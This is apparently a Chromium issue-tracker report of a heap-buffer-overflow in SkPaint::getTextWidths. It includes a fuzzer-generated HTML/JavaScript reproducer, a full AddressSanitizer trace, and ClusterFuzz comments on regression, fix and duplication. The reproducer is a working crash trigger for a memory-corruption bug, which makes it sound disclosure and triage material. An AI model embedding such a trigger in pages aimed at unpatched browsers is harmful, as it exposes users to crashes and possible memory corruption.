Issue metadata
Sign in to add a comment
|
Security: heap-buffer-overflow in SkPaint::getTextWidths
Reported by
cloudfuz...@gmail.com,
Aug 5
|
||||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of content_shell
VERSION
Chrome Version: asan-linux-release-580772
Operating System: Linux 64bit
REPRODUCTION CASE
<script>
function start() {
s0='missspelled';
s3=s0.repeat(10);
s6=s3.repeat(7);
s9=s6.repeat(3);
s38=s9.repeat(3);
s39='undefined'+s38;
s48=unescape('%20%u200F');
s49=s39.repeat(10);
s50=s48.concat(undefined,s49);
s83=s50.concat('undefined');
s84=s83.repeat(1);
o761=document.createElementNS('http://www.w3.org/1999/xhtml','li');
document.documentElement.appendChild(o761);
o761.after(s84);
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
=================================================================
==32138==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000002f610 at pc 0x000003e8f693 bp 0x7fff56c30cf0 sp 0x7fff56c30ce8
WRITE of size 4 at 0x63000002f610 thread T0 (content_shell)
#0 0x3e8f692 in set third_party/skia/include/core/SkRect.h:1000:17
#1 0x3e8f692 in set_bounds third_party/skia/src/core/SkPaint.cpp:658
#2 0x3e8f692 in SkPaint::getTextWidths(void const*, unsigned long, float*, SkRect*) const third_party/skia/src/core/SkPaint.cpp:912
#3 0x10c89a0f in blink::SkiaTextMetrics::GetSkiaBoundsForGlyphs(WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator>, SkRect*) third_party/blink/renderer/platform/fonts/skia/skia_text_metrics.cc:83:11
#4 0x10c84b36 in blink::SimpleFontData::BoundsForGlyphs(WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator>, WTF::Vector<SkRect, 0u, WTF::PartitionAllocator>*) const third_party/blink/renderer/platform/fonts/simple_font_data.cc:364:28
#5 0x10c6781a in void blink::ShapeResult::ComputeGlyphBounds<true>(blink::ShapeResult::RunInfo const&, WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator> const&) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:963:21
#6 0x10c54694 in void blink::ShapeResult::ComputeGlyphPositions<true>(blink::ShapeResult::RunInfo*, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:928:3
#7 0x10c52ea4 in blink::ShapeResult::InsertRun(std::__1::unique_ptr<blink::ShapeResult::RunInfo, std::__1::default_delete<blink::ShapeResult::RunInfo> >, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:989:5
#8 0x10c277ab in blink::HarfBuzzShaper::CommitGlyphs(blink::RangeData*, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::BufferSlice const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:345:19
#9 0x10c29394 in blink::HarfBuzzShaper::ExtractShapeResults(blink::RangeData*, bool&, blink::ReshapeQueueItem const&, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:476:7
#10 0x10c2ee9f in blink::HarfBuzzShaper::ShapeSegment(blink::RangeData*, blink::RunSegmenter::RunSegmenterRange const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:933:5
#11 0x10c3356d in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection, unsigned int, unsigned int, blink::RunSegmenter::RunSegmenterRange const*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:986:9
#12 0x10c35d34 in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:1011:10
#13 0x10c14ed5 in blink::CachingWordShapeIterator::ShapeWordWithoutSpacing(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.cc:21:14
#14 0x10c11afc in blink::CachingWordShapeIterator::ShapeWord(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:87:14
#15 0x10c11e57 in blink::CachingWordShapeIterator::ShapeToEndIndex(scoped_refptr<blink::ShapeResult const>*, unsigned int) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:161:17
#16 0x10c0e590 in NextWord third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:94:12
#17 0x10c0e590 in blink::CachingWordShapeIterator::Next(scoped_refptr<blink::ShapeResult const>*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:77
#18 0x10c0e0b6 in blink::CachingWordShaper::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shaper.cc:49:19
#19 0x10bbfa5b in blink::Font::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) const third_party/blink/renderer/platform/fonts/font.cc:271:17
#20 0x137c049d in TextWidth third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:728:15
#21 0x137c049d in blink::BreakingContext::HandleText(WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&, bool&) third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:1267
#22 0x137af48c in blink::LineBreaker::NextLineBreak(blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::LineInfo&, blink::LayoutTextInfo&, WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&) third_party/blink/renderer/core/layout/line/line_breaker.cc:99:19
#23 0x1339f9fd in blink::LayoutBlockFlow::LayoutRunsAndFloatsInRange(blink::LineLayoutState&, blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::InlineIterator const&, blink::BidiStatus const&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1121:22
#24 0x1339bd2b in blink::LayoutBlockFlow::LayoutRunsAndFloats(blink::LineLayoutState&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1000:3
#25 0x133b1705 in blink::LayoutBlockFlow::LayoutInlineChildren(bool, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1992:5
#26 0x1333127a in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:598:5
#27 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#28 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#29 0x1333c877 in blink::LayoutBlockFlow::PositionAndLayoutOnceIfNeeded(blink::LayoutBox&, blink::LayoutUnit, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:791:11
#30 0x1333d92d in blink::LayoutBlockFlow::LayoutBlockChild(blink::LayoutBox&, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:854:7
#31 0x13338be8 in blink::LayoutBlockFlow::LayoutBlockChildren(bool, blink::SubtreeLayoutScope&, blink::LayoutUnit, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow.cc:1559:5
#32 0x1333125e in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:600:5
#33 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#34 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#35 0x1333c877 in blink::LayoutBlockFlow::PositionAndLayoutOnceIfNeeded(blink::LayoutBox&, blink::LayoutUnit, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:791:11
#36 0x1333d92d in blink::LayoutBlockFlow::LayoutBlockChild(blink::LayoutBox&, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:854:7
#37 0x13338be8 in blink::LayoutBlockFlow::LayoutBlockChildren(bool, blink::SubtreeLayoutScope&, blink::LayoutUnit, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow.cc:1559:5
#38 0x1333125e in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:600:5
#39 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#40 0x13746199 in blink::LayoutView::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_view.cc:312:20
#41 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#42 0x137472b7 in blink::LayoutView::UpdateLayout() third_party/blink/renderer/core/layout/layout_view.cc:355:20
#43 0x125a035a in blink::LocalFrameView::PerformLayout(bool) third_party/blink/renderer/core/frame/local_frame_view.cc:769:24
#44 0x1259b623 in blink::LocalFrameView::UpdateLayout() third_party/blink/renderer/core/frame/local_frame_view.cc:931:7
#45 0x11bb0bae in blink::Document::ImplicitClose() third_party/blink/renderer/core/dom/document.cc:3357:15
#46 0x11bb1a9c in blink::Document::CheckCompletedInternal() third_party/blink/renderer/core/dom/document.cc:3423:5
#47 0x11bb046c in blink::Document::CheckCompleted() third_party/blink/renderer/core/dom/document.cc:3399:7
#48 0x13ad8232 in blink::FrameLoader::FinishedParsing() third_party/blink/renderer/core/loader/frame_loader.cc:417:26
#49 0x11bda58e in blink::Document::FinishedParsing() third_party/blink/renderer/core/dom/document.cc:5905:21
#50 0x12cbad23 in end third_party/blink/renderer/core/html/parser/html_document_parser.cc:890:18
#51 0x12cbad23 in blink::HTMLDocumentParser::AttemptToRunDeferredScriptsAndEnd() third_party/blink/renderer/core/html/parser/html_document_parser.cc:905
#52 0x12cc1bca in blink::HTMLDocumentParser::ProcessTokenizedChunkFromBackgroundParser(std::__1::unique_ptr<blink::HTMLDocumentParser::TokenizedChunk, std::__1::default_delete<blink::HTMLDocumentParser::TokenizedChunk> >) third_party/blink/renderer/core/html/parser/html_document_parser.cc
#53 0x12cbc851 in blink::HTMLDocumentParser::PumpPendingSpeculations() third_party/blink/renderer/core/html/parser/html_document_parser.cc:591:9
#54 0x10f2e4a3 in Run base/callback.h:99:12
#55 0x10f2e4a3 in blink::TaskHandle::Runner::Run(blink::TaskHandle const&) third_party/blink/renderer/platform/web_task_runner.cc:55
#56 0xacc112c in Run base/callback.h:99:12
#57 0xacc112c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#58 0xada7245 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) base/task/sequence_manager/thread_controller_impl.cc:169:21
#59 0xacc112c in Run base/callback.h:99:12
#60 0xacc112c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#61 0xacbb704 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:431:46
#62 0xacbcbbc in DeferOrRunPendingTask base/message_loop/message_loop.cc:442:5
#63 0xacbcbbc in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:514
#64 0xacc584f in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#65 0xad3383b in base::RunLoop::Run() base/run_loop.cc:102:14
#66 0x17d26b8a in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:200:23
#67 0x8661c53 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:493:14
#68 0x86657f9 in content::ContentMainRunnerImpl::Run(bool) content/app/content_main_runner_impl.cc:891:10
#69 0xfed3e59 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:472:29
#70 0x5e85ace in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#71 0x356e6f7 in main content/shell/app/shell_main.cc:39:10
#72 0x7f56eff002e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
0x63000002f610 is located 0 bytes to the right of 61968-byte region [0x630000020400,0x63000002f610)
allocated by thread T0 (content_shell) here:
#0 0x353ed53 in __interceptor_malloc /b/swarming/w/ir/kitchen-workdir/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0xff69fe2 in PartitionAllocGenericFlags base/allocator/partition_allocator/partition_alloc.h:348:18
#2 0xff69fe2 in Alloc base/allocator/partition_allocator/partition_alloc.h:368
#3 0xff69fe2 in BufferMalloc third_party/blink/renderer/platform/wtf/allocator/partitions.h:97
#4 0xff69fe2 in WTF::PartitionAllocator::AllocateBacking(unsigned long, char const*) third_party/blink/renderer/platform/wtf/allocator/partition_allocator.cc:13
#5 0x10c67717 in AllocateVectorBacking<SkRect> third_party/blink/renderer/platform/wtf/allocator/partition_allocator.h:43:9
#6 0x10c67717 in AllocateBuffer third_party/blink/renderer/platform/wtf/vector.h:402
#7 0x10c67717 in VectorBuffer third_party/blink/renderer/platform/wtf/vector.h:500
#8 0x10c67717 in Vector third_party/blink/renderer/platform/wtf/vector.h:1345
#9 0x10c67717 in void blink::ShapeResult::ComputeGlyphBounds<true>(blink::ShapeResult::RunInfo const&, WTF::Vector<unsigned short, 0u, WTF::PartitionAllocator> const&) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:962
#10 0x10c54694 in void blink::ShapeResult::ComputeGlyphPositions<true>(blink::ShapeResult::RunInfo*, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:928:3
#11 0x10c52ea4 in blink::ShapeResult::InsertRun(std::__1::unique_ptr<blink::ShapeResult::RunInfo, std::__1::default_delete<blink::ShapeResult::RunInfo> >, unsigned int, unsigned int, hb_buffer_t*) third_party/blink/renderer/platform/fonts/shaping/shape_result.cc:989:5
#12 0x10c277ab in blink::HarfBuzzShaper::CommitGlyphs(blink::RangeData*, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::BufferSlice const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:345:19
#13 0x10c29394 in blink::HarfBuzzShaper::ExtractShapeResults(blink::RangeData*, bool&, blink::ReshapeQueueItem const&, blink::SimpleFontData const*, UScriptCode, blink::CanvasRotationInVertical, bool, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:476:7
#14 0x10c2ee9f in blink::HarfBuzzShaper::ShapeSegment(blink::RangeData*, blink::RunSegmenter::RunSegmenterRange const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:933:5
#15 0x10c3356d in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection, unsigned int, unsigned int, blink::RunSegmenter::RunSegmenterRange const*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:986:9
#16 0x10c35d34 in blink::HarfBuzzShaper::Shape(blink::Font const*, blink::TextDirection) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:1011:10
#17 0x10c14ed5 in blink::CachingWordShapeIterator::ShapeWordWithoutSpacing(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.cc:21:14
#18 0x10c11afc in blink::CachingWordShapeIterator::ShapeWord(blink::TextRun const&, blink::Font const*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:87:14
#19 0x10c11e57 in blink::CachingWordShapeIterator::ShapeToEndIndex(scoped_refptr<blink::ShapeResult const>*, unsigned int) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:161:17
#20 0x10c0e590 in NextWord third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:94:12
#21 0x10c0e590 in blink::CachingWordShapeIterator::Next(scoped_refptr<blink::ShapeResult const>*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shape_iterator.h:77
#22 0x10c0e0b6 in blink::CachingWordShaper::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) third_party/blink/renderer/platform/fonts/shaping/caching_word_shaper.cc:49:19
#23 0x10bbfa5b in blink::Font::Width(blink::TextRun const&, WTF::HashSet<blink::SimpleFontData const*, WTF::PtrHash<blink::SimpleFontData const>, WTF::HashTraits<blink::SimpleFontData const*>, WTF::PartitionAllocator>*, blink::FloatRect*) const third_party/blink/renderer/platform/fonts/font.cc:271:17
#24 0x137c049d in TextWidth third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:728:15
#25 0x137c049d in blink::BreakingContext::HandleText(WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&, bool&) third_party/blink/renderer/core/layout/line/breaking_context_inline_headers.h:1267
#26 0x137af48c in blink::LineBreaker::NextLineBreak(blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::LineInfo&, blink::LayoutTextInfo&, WTF::Vector<blink::WordMeasurement, 64u, WTF::PartitionAllocator>&) third_party/blink/renderer/core/layout/line/line_breaker.cc:99:19
#27 0x1339f9fd in blink::LayoutBlockFlow::LayoutRunsAndFloatsInRange(blink::LineLayoutState&, blink::BidiResolver<blink::InlineIterator, blink::BidiRun, blink::BidiIsolatedRun>&, blink::InlineIterator const&, blink::BidiStatus const&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1121:22
#28 0x1339bd2b in blink::LayoutBlockFlow::LayoutRunsAndFloats(blink::LineLayoutState&) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1000:3
#29 0x133b1705 in blink::LayoutBlockFlow::LayoutInlineChildren(bool, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow_line.cc:1992:5
#30 0x1333127a in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:598:5
#31 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#32 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
#33 0x1333c877 in blink::LayoutBlockFlow::PositionAndLayoutOnceIfNeeded(blink::LayoutBox&, blink::LayoutUnit, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:791:11
#34 0x1333d92d in blink::LayoutBlockFlow::LayoutBlockChild(blink::LayoutBox&, blink::BlockChildrenLayoutInfo&) third_party/blink/renderer/core/layout/layout_block_flow.cc:854:7
#35 0x13338be8 in blink::LayoutBlockFlow::LayoutBlockChildren(bool, blink::SubtreeLayoutScope&, blink::LayoutUnit, blink::LayoutUnit) third_party/blink/renderer/core/layout/layout_block_flow.cc:1559:5
#36 0x1333125e in blink::LayoutBlockFlow::LayoutChildren(bool, blink::SubtreeLayoutScope&) third_party/blink/renderer/core/layout/layout_block_flow.cc:600:5
#37 0x1332f524 in blink::LayoutBlockFlow::UpdateBlockLayout(bool) third_party/blink/renderer/core/layout/layout_block_flow.cc:471:5
#38 0x13301f79 in blink::LayoutBlock::UpdateLayout() third_party/blink/renderer/core/layout/layout_block.cc:439:3
SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/skia/include/core/SkRect.h:1000:17 in set
Shadow bytes around the buggy address:
0x0c607fffde70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffde80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffde90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffdea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fffdeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c607fffdec0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffded0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fffdf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==32138==ABORTING |
,
Aug 6
,
Aug 7
Still waiting for the regression range to identify the culprit CL and an owner.
,
Aug 7
Detailed report: https://clusterfuzz.com/testcase?key=6577431109173248 Job Type: linux_asan_content_shell Platform Id: linux Crash Type: Heap-buffer-overflow WRITE 4 Crash Address: 0x63000002f4f0 Crash State: SkPaint::getTextWidths void blink::ShapeResult::ComputeGlyphPositions<true> blink::ShapeResult::InsertRun Sanitizer: address (ASAN) Recommended Security Severity: High Regressed: https://clusterfuzz.com/revisions?job=linux_asan_content_shell&range=579681:579682 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=6577431109173248 See https://github.com/google/clusterfuzz-tools for more information.
,
Aug 7
This is a serious security regression. If you are not able to fix this quickly, please revert the change that introduced it. If this doesn't affect a release branch, or has not been properly classified for severity, please update the Security_Impact or Security_Severity labels, and remove the ReleaseBlock label. To disable this altogether, apply ReleaseBlock-NA. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 7
,
Aug 7
Oh wait, that's a duplicate of issue 870178 .
,
Aug 10
ClusterFuzz has detected this issue as fixed in range 581423:581427. Detailed report: https://clusterfuzz.com/testcase?key=6577431109173248 Job Type: linux_asan_content_shell Platform Id: linux Crash Type: Heap-buffer-overflow WRITE 4 Crash Address: 0x63000002f4f0 Crash State: SkPaint::getTextWidths void blink::ShapeResult::ComputeGlyphPositions<true> blink::ShapeResult::InsertRun Sanitizer: address (ASAN) Recommended Security Severity: High Regressed: https://clusterfuzz.com/revisions?job=linux_asan_content_shell&range=579681:579682 Fixed: https://clusterfuzz.com/revisions?job=linux_asan_content_shell&range=581423:581427 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=6577431109173248 See https://github.com/google/clusterfuzz-tools for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Nov 15
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by ClusterFuzz
, Aug 6